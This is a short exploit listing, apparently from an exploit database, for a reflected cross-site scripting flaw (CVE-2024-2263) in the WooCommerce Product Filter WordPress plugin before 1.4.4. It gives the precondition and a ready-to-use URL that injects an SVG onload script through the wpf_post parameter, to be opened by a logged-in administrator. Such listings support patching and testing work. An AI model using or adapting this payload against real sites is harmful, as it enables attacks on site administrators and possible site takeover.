Exploit for WooCommerce Product Filter < 1.4.4 - Reflected XSS CVE-2024-2263

Name: Exploit for WooCommerce Product Filter < 1.4.4 - Reflected XSS CVE-2024-2263
Rating: 5 (62 reviews)

2024-03-11 | CVSS 6.0

## https://sploitus.com/exploit?id=WPEX-ID:EC092ED9-EB3E-40A7-A878-AB854104E290
Make a logged in admin open the URL below (the filter with the slug test1 needs to exist):

https://example.com/wp-admin/admin.php?page=wpf_search&action=delete&paged=1&wpf_post[]=test1&wpf_post[]=<svg/onload=alert(/XSS/)>&action2=delete